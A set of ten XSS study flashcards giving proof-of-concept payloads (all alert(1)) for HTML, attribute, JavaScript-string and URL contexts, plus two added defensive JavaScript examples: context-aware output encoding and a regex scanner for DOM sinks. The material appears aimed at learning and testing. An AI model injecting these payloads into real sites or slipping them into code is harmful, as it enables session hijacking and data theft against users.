XSS Payload Flashcards

(10 cards)

1
Q

What is the basic proof-of-concept payload for reflected XSS when the input lands directly in the HTML body?

A
<script>alert(1)</script>
2
Q

What payload works well in an HTML context?

A

<img src=x onerror=alert(1)>
Fires on load with no user interaction. Unlike <script>, it also executes when the markup is inserted through innerHTML (the HTML spec does not run script elements inserted that way), so it is the usual choice when <script> is filtered or the sink is a DOM property.

3
Q

What payload works when injected into a JavaScript string?

A

');alert(1);//
Closes the single-quoted string and the call it sits in, runs alert(1), then comments out the rest of the line. Use the quote character actually in use (" for a double-quoted string). If quotes are escaped but < is not, </script><script>alert(1)</script> breaks out of the whole script block, because the HTML parser ends the script element before the JavaScript parser ever sees the string.

4
Q

What payload can be used inside a link or URL context?

A

javascript:alert(1)
Goes wherever untrusted data is written into a URL-bearing attribute such as href, src or action. In an <a> it fires only when the user follows the link; in an <iframe src> it runs on load. HTML entity encoding does not help in this context, since the browser decodes the attribute before parsing the URL; the defence is allow-listing the scheme (http, https, mailto).

5
Q

What payload is used in attribute injection (e.g., inside a tag)?

A

" onmouseover=alert(1) x="
First close the existing attribute value with the quote character in use (" or ', or nothing if the value is unquoted), then add an event-handler attribute; the trailing x=" absorbs the original closing quote so the tag still parses. It fires when the user hovers; a variant that needs no interaction is " autofocus onfocus=alert(1) x=".

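The five payloads above side by side with the output encoding that neutralises each one in its own context, as an added example (not code from the original flashcards; the helper names escapeHtml, escapeJsString, safeUrl, renderUnsafe and render, and the constructed PAYLOADS table, are my own assumptions):

```javascript
// Added example, not from the original page: context-aware output encoding
// for the HTML-body, attribute, JavaScript-string and URL contexts above.
// All helper names and the PAYLOADS/SLOT tables are assumptions for illustration.

// Constructed attacker inputs, one per context card.
const PAYLOADS = {
  htmlBody:  '<script>alert(1)</script>',
  htmlTag:   '<img src=x onerror=alert(1)>',
  jsString:  "');alert(1);//",
  url:       'javascript:alert(1)',
  attribute: '" onmouseover=alert(1) x="',
};
// Which rendered slot each payload is aimed at.
const SLOT = { htmlBody: 'body', htmlTag: 'body', jsString: 'script', url: 'href', attribute: 'attr' };

// HTML body and quoted-attribute context: entity-encode the characters that
// can open a tag, close an attribute value or start an entity.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '`': '&#x60;' };
  return String(s).replace(/[&<>"'`]/g, (c) => map[c]);
}

// JavaScript string-literal context: \xHH / \uHHHH for everything but [A-Za-z0-9].
// "<" and "/" are escaped too, so "</script>" can no longer end the script block.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const h = c.charCodeAt(0).toString(16);
    return h.length <= 2 ? '\\x' + h.padStart(2, '0') : '\\u' + h.padStart(4, '0');
  });
}

// URL context: allow-list the scheme. Blocklisting "javascript:" fails against
// case changes and embedded tabs; the WHATWG URL parser (Node and browsers)
// strips tabs/newlines and lower-cases the scheme before we compare it.
function safeUrl(s) {
  let u;
  try { u = new URL(String(s), 'https://example.invalid/'); } catch { return 'about:blank'; }
  return ['http:', 'https:', 'mailto:'].includes(u.protocol) ? String(s) : 'about:blank';
}

// Vulnerable rendering: raw concatenation into every context.
function renderUnsafe(input) {
  return {
    body:   `<p>Hello ${input}</p>`,
    attr:   `<input value="${input}">`,
    href:   `<a href="${input}">profile</a>`,
    script: `<script>var user = '${input}';</script>`,
  };
}

// Hardened rendering: the encoder is chosen by where the value lands.
function render(input) {
  return {
    body:   `<p>Hello ${escapeHtml(input)}</p>`,
    attr:   `<input value="${escapeHtml(input)}">`,
    href:   `<a href="${escapeHtml(safeUrl(input))}">profile</a>`,
    script: `<script>var user = '${escapeJsString(input)}';</script>`,
  };
}

// True if the payload for `key` reaches its target slot unchanged.
function survives(renderFn, key) {
  return renderFn(PAYLOADS[key])[SLOT[key]].includes(PAYLOADS[key]);
}

for (const key of Object.keys(PAYLOADS)) {
  console.log(key.padEnd(10), 'unsafe:', survives(renderUnsafe, key), ' hardened:', survives(render, key));
}
```

Run it with node: every payload survives renderUnsafe and none survives render. The point worth remembering is that escapeHtml alone is not enough: it leaves javascript:alert(1) untouched, which is harmless in a <p> but fatal in an href, so the href slot needs the scheme check as well.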
6
Q

Which JavaScript sinks should raise red flags for XSS?

A

innerHTML, document.write(), eval(), setTimeout() and location.href
innerHTML and document.write() parse whatever they are given as HTML; eval() and setTimeout() with a string argument parse it as JavaScript; assigning a javascript: URL to location.href navigates to it and runs it. Note that location is also one of the most common sources (location.search, location.hash), so trace the data from source to sink rather than stopping at the sink name.

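A small static scanner for the sinks named on this card, run over a constructed client-side snippet, as an added example (not from the original page; the SINKS and SOURCES tables, the one-pass variable taint tracking and the SAMPLE source are my own assumptions, and the regexes are deliberately simple):

```javascript
// Added example, not from the original page: find the DOM XSS sinks from the
// card above in JavaScript source and note whether the value fed to each one
// traces back to a DOM source. SINKS, SOURCES and SAMPLE are assumptions.

// Sink patterns. For setTimeout/setInterval only a non-function first argument
// counts, since a function literal is not parsed as code.
const SINKS = [
  { name: 'innerHTML',      re: /\.(?:inner|outer)HTML\s*=(?!=)/ },
  { name: 'document.write', re: /\bdocument\.write(?:ln)?\s*\(/ },
  { name: 'eval',           re: /\beval\s*\(/ },
  { name: 'setTimeout',     re: /\bset(?:Timeout|Interval)\s*\(\s*(?!function\b|\(|[\w$]+\s*=>)/ },
  { name: 'location.href',  re: /\b(?:window\.)?location(?:\.href)?\s*=(?!=)|\blocation\.(?:assign|replace)\s*\(/ },
];

// Attacker-controlled DOM sources.
const SOURCES = /\b(?:location\.(?:hash|search)|document\.(?:URL|referrer|cookie)|window\.name)\b/;

// Constructed sample of vulnerable and harmless lines (line numbers start at 1).
const SAMPLE = [
  "const params = new URLSearchParams(location.search);",
  "const name = params.get('name');",
  "const greeting = 'Hello ' + name;",
  "document.getElementById('out').innerHTML = greeting;",
  "document.getElementById('ver').innerHTML = '<b>v2</b>';",
  "eval(name);",
  "setTimeout(() => render(name), 0);",
  "setTimeout(\"load('\" + location.hash + \"')\", 10);",
  "location.href = document.referrer;",
  "location.href = '/home';",
  "if (location.href === cached) { document.write('<p>same</p>'); }",
].join('\n');

// Returns [{ line, sink, tainted, text }] for every sink found. Taint is
// propagated line by line through simple `x = ...` assignments whose right-hand
// side mentions a DOM source or an already-tainted variable.
function findSinks(source) {
  const tainted = new Set();
  const findings = [];
  const isTainted = (text) =>
    SOURCES.test(text) ||
    [...tainted].some((v) => new RegExp('\\b' + v.replace(/\$/g, '\\$') + '\\b').test(text));

  source.split('\n').forEach((line, i) => {
    // `const x = <rhs>` / `x = <rhs>`: property assignments (a.b = ...) are skipped.
    const asg = line.match(/^\s*(?:const|let|var)?\s*([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.*)$/);
    if (asg && isTainted(asg[2])) tainted.add(asg[1]);

    for (const { name, re } of SINKS) {
      const m = re.exec(line);
      if (!m) continue;
      // Only the text after the sink is the argument; this keeps the
      // `location.href` on the left of an assignment from counting as a source.
      const arg = line.slice(m.index + m[0].length);
      findings.push({ line: i + 1, sink: name, tainted: isTainted(arg), text: line.trim() });
    }
  });
  return findings;
}

for (const f of findSinks(SAMPLE)) {
  console.log(`line ${f.line}: ${f.sink.padEnd(14)} ${f.tainted ? 'TAINTED ' : 'constant'}  ${f.text}`);
}
```

The output flags innerHTML on line 4, eval on line 6, the string-argument setTimeout on line 8 and the location.href assignment on line 9 as tainted, and lists the constant innerHTML, location.href and document.write uses for review without taint. Line 7 is not reported at all because its first argument is an arrow function, and line 11 shows why the comparison `location.href === cached` must not match the assignment pattern. Real tooling (Semgrep, CodeQL) does this with an AST and inter-procedural data flow; the regex version is only meant to make the source-to-sink idea concrete.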
7
Q

What tool can help generate and test XSS payloads?

A

Burp Suite (Intruder to fuzz a list of payloads against the injection point, Repeater to hand-tune a single request) or an XSS cheat sheet

8
Q

What should you do instead of memorizing every payload?

A

Understand the injection context first, then maintain a personal payload bank organised by context

9
Q

What GitHub resource provides common payloads for XSS?

A

PayloadsAllTheThings (swisskyrepo/PayloadsAllTheThings on GitHub)

10
Q

What mindset helps with building payloads on the fly?

A

Learn how the browser's HTML, JavaScript and URL parsers treat your input, and recognise which injection context you are in; the payload then follows from the context
